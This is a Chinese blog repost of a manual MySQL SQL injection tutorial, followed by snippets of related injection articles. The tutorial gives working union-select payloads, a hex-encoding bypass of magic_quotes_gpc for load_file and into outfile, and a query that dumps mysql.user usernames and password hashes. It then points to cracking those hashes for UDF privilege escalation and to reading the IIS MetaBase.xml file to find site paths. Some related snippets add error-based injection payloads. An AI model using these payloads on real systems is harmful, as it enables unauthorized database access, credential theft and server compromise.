MySql 手工注入实战

最新推荐文章于 2021-07-14 00:25:28 发布
最新推荐文章于 2021-07-14 00:25:28 发布
阅读量93 收藏
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/amwld/archive/2011/06/27/2091593.html
版权
1.如何判断权限是否为root
and ord(mid(user(),1,1))=114 返回正常 即为ROOT权限,
2.注入点只有一个地方显示数据,如何查询多条数据
假设这个注入点 只有3 如何显示多条数据?
使用concat函数。
格式concat(user(),database(),version(),@@datadir)
root@localhosthyxy5.1.40-communityC:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
这样不好看? 可以自己加个空格
oot@localhost hyxy 5.1.40-community C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
这是数据,如果是想同时爆出所有数据库、表、列
即可用group_concat
and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--

3.如何使用十六进制绕过 '
mysql数据库自带一个函数 hex 即可把字符转换成hex16进制
当然 用unhex 即可反之。
select hex('isosky');
select unhex('69736F736B79');
4.为什么root权限读入不了文件
(1)root被降权了
(2)linux服务器必须对目录有权限才可操作
(3)php.ini中的magic_quotes_gpc 为on 这个变量主要就是防止黑客攻击的
当为on时,不能直接输入路径,我们可以转换为hex绕过!当然我们也就可以通过这样来判断他的magic_quotes_gpc
的状态!
load_file('c:/boot.ini') 失败
load_file(0x633A2F626F6F742E696E69) 即可
5.为什么root没有写入权限
(1)root被降权了
(2)linux服务器必须对目录有权限才可操作
(3)同样是由于magic_quotes_gpc为on 是不可写入的。从第四个问题我们已经知道这台服务器的magic_quotes_gpc
是为on 所以是不能写入的。
可以测试一下。
'test'into outfile'c://1.txt' 返回错误 并没有写入成功!
6.windows服务器不知道路径,但是我想查到数据库的密码,这样可以直接拿到密码进行udf提权 怎么做?
select user,password,host from mysql.user 即可查询到
这个注入点的权限为root 自然对mysql数据库有查询权限
当然因为magic_quotes_gpc 为on 所以要使用hex绕过'
修改后即为
select  concat(unhex(hex(cast(user as char))),0x3a,unhex(hex(cast(password as char))),0x3a,unhex(hex(cast(host as char))))  from mysql.user
(hex(cast((user as char))) 把user使用char类型查看然后转换为hex 这样得出的结果是hex
但是查询要是铭文 所以还要unhex,这样即可查询到用户.完善之后
root*81F5E21E35407D884A6CD4A731AEBFB6AF209E1Blocalhost
为了好看,可以加个空格或者冒号
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B:localhost  
然后我们补充到注入点即为
and 1=2 union select 1,2,(select  concat(unhex(hex(cast(user as char))),0x3a,unhex(hex(cast(password as char))),0x3a,unhex(hex(cast(host as char))))  from mysql.user limit 0,10),4,5,6,7,8,9,10
没有设定limit 显示的行数,结果爆出,害得我找半天。。
设定一下limit即可.
root:*DA042342E98014F25016DB9ACB43BD9ACE038343:localhost
之后破解hash即可UDF提权。
CMD5 就是这么不给力!
7.更多函数、技巧
+ 可以代替空格
比如 select 1,2,3,4,5 可以转换为 select+1,2,3,4,5
在注入点ID前面加个 - 号 可以代替 and 1=2
我想想。。。嗯。。实在想不到了。暂时就这么多吧。有问题可以单独和谐。。

----------------------------------------------
补充一个技巧:
IIS可以通过读取IIS配置文件找到网站路径!
c:\\windows\\system32\\inetsrv\\MetaBase.xml

转载于:https://www.cnblogs.com/amwld/archive/2011/06/27/2091593.html

weixin_30470857
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP+Mysql注入攻防实战.pdf
04-22
手工注入是指攻击者手动构造和发送含有恶意SQL代码的请求,通过对返回结果的分析,逐步了解和控制数据库。这通常涉及一系列试探性操作,如测试字符串长度、判断布尔值等,以逐步构建完整的SQL查询语句。 #### 工具...
手工注入常用SQL语句笔记.docx
04-10
二、MySQL 注入实战心得 1. 试参数:任何注入参数,都需确定其类型(数字还是字符)。 2. 试类型:五大类(BEUST): * 布尔型盲注:and 1=1 , and 1=2 , or 1=1 , or 1=2 ...... * 报错型注入 * UNION 联合查询...
mysql报错注入实战_手工注入——MySQL手工注入实战和分析
weixin_39746382的博客
01-18 98
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。第一步,判断注入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在注入点。如下图。第二步,判断字段数通过 order by 语句,如果后面输入的...
【SQL注入】通过实战教你手工注入MySql数据库
Monsterlz123的博客
05-29 4285
【SQL注入】通过实战教你手工注入MySql数据库 Hello,各位小伙伴们大家晚上好~~ 不知不觉,已经是本公众号的第八篇技术文章了,你们都有认真阅读吗? 正当小编发愁下一篇写什么的时候,鲁迅发话了: 好吧,那么我们就一起来学习一下,对PHP+MySql组合的网站,怎么进行纯手工注入吧,Here we go~ 一、准备准备 NPMserv: PHP + Mysql 集成环境,下载后在wi...
mysql报错注入实战_MySQL手工注入实战
weixin_34972980的博客
02-02 166
实战记录,日本某站注入点 and 语句测试and1=1 返回正常,and=2跳回首页,可能过滤了用 ’ 测试返回错误页面判断为注入点order by语句查询字段数测试字段数为9and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9报错联合查询语句,查询显示位2、3为显示位使用注入函数可爆出数据库版本信息and 1=2 UNION SELECT 1,@@version_comp...
mysql报错注入实战_十种MySQL报错注入
weixin_35377249的博客
02-02 104
以下均摘自《代码审计:企业级Web代码安全架构》一书1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()selec...
SQL注入法攻击一日通
03-31
### SQL注入攻击详解 #### 一、SQL注入攻击概述 SQL注入是一种常见的网络攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制后端数据库服务器。这种攻击方式利用了程序设计上的漏洞,特别是对用户输入数据未...
mybatis基础及项目实战
03-01
它消除了几乎所有的JDBC代码和参数的手工设置以及结果集的检索封装工作。MyBatis使用简单的XML或注解进行配置和原始映射,将接口和Java的POJOs(Plain Old Java Objects,普通的Java对象)映射成数据库中的记录。 -...
mysql日本_MYSQL手工注入某日本网站
weixin_39934257的博客
01-19 423
作者:ice 团队:www.anying.org 转载必须注明。E-mail:1c30day@gmail.com经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了。找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一。去了解注入,还是有必要的。随便google了几个日本网站,发现不少都在注入点,有很多用手工都比较鸡肋,终于找...
mysql报错注入实战_MySQL 报错注入原理分析以及运用
weixin_42513448的博客
02-28 203
0x00 前言之前在做sqli-labs 第五第六题的时候是利用盲注来进行做的 中途操作过程非常繁杂每个信息都要使用脚本来进行拆解 就算我用python编了相应的脚本 仍然感觉麻烦 所以昨天再去看了看 好像题目的本意不是让我们用盲注的方法来实现的 题目是想让我们使用报错注入 (双查询注入)来进行获取数据库的一些信息0x01 原理分析首先需要知道的一些知识为什么叫做报错注入 原因就是我们是通过反馈出...
[MYSQL手工注入](3)基于报错的SQL注入实战
baguangman5501的博客
07-17 195
0x03 MYSQL 手工注入实战——基于错误的 SQL 注入 今天如愿以偿的找到了基于错误的SQL注入环境了:是一个国外卖音响的小网站,还在建设中: 看一下报错信息: (1)确定闭合语句:从上面的报错信息来看,这里应该是不需要闭合即可注入 (2)order by 查询字段数: (3)确定数据可显位置: (4)先来一句素质三连(数据库名、用户名、数据库版本): (5)查询当...
mysql高级报错注入_mysql新型报错注入实例
weixin_39913807的博客
02-08 131
使用DVWA的第一关作为例子讲解一下mysql的新型注入。第一关链接:http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=%C8%B7%B6%A8# ,参数id存在注入http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1’&Submit=%C8%B7%B6%A...
Mysql注入实战
weixin_43821278的博客
07-14 192
mysql注入实战】-报错注入与布尔盲注报错注入布尔盲注 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。未经过授权,禁止非法测试。 报错注入 靶场如图。没有验证码防止爆破。打开burp,试试有没有SQL注入burp抓包如下: 居然有错误回显,那没得说了。直接上sqlmap,但是没有成功。不知道为什么,显示404 not found好吧。那就借助burp半自动好了。 查看用户user(),database(),version() refurl=&us
渗透学习笔记之基于数字型的SQL注入
冰露寒愁的博客
12-10 713
基于数字型的SQL注入注入流程:1.判断SQL注入2.判断是否为root权限3.判断数据库的字段数4.查库名5.查表名6.查字段7.查数据参考文献 注入流程: 1.判断SQL注入 (1) 在提交的URL后加上单引号’, (2) and和or大法:and表示且,必须二者皆成立。or相反。 (3) 加法和减法:这目的是区分数字型和字符型的注入。 2.判断是否为root权限 (1) 目的是判断是否有ro...
SQL注入实战————1、MySQL手工注入实战
Fly_鹏程万里
05-06 1万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! SQL注入实战 靶场地址:http://219.153.49.228:48204/show.php?id=MQ== 首先可以看到该URL中存在一个参数“MQ==”,从参...
mysql报错注入(显错注入)整理
Master'Blog
11-02 1815
1、通过floor暴错 /*数据库版本*/ and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_s
SQL注入系列之PHP+Mysql手动注入(一)----数字型
热门推荐
fendo
01-01 1万+
常见的几种SQL注入 1.数字型 2.字符型 3.文本型 4.搜索型(POST/GET) 5.cookie注入 6.SQL盲注 MySQL报错注入基本流程: Mysql注入步骤 1.判断sql注入 2.猜解表名 3.猜解列名 4.猜解字段内容 5.导出webshell 1.判断sql注入 ○提交单引号' ○and大法和or大法
PHP+MYSQL手工注入实战:获取ROOT权限与数据库连接文件
总结来说,这篇文章主要阐述了PHPMySQL手工注入攻击的实战应用,包括识别注入点、利用特定功能进行权限获取,以及数据库配置文件的潜在风险。同时,它也强调了网络安全和代码安全的重要性,提醒开发者们警惕并防范...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值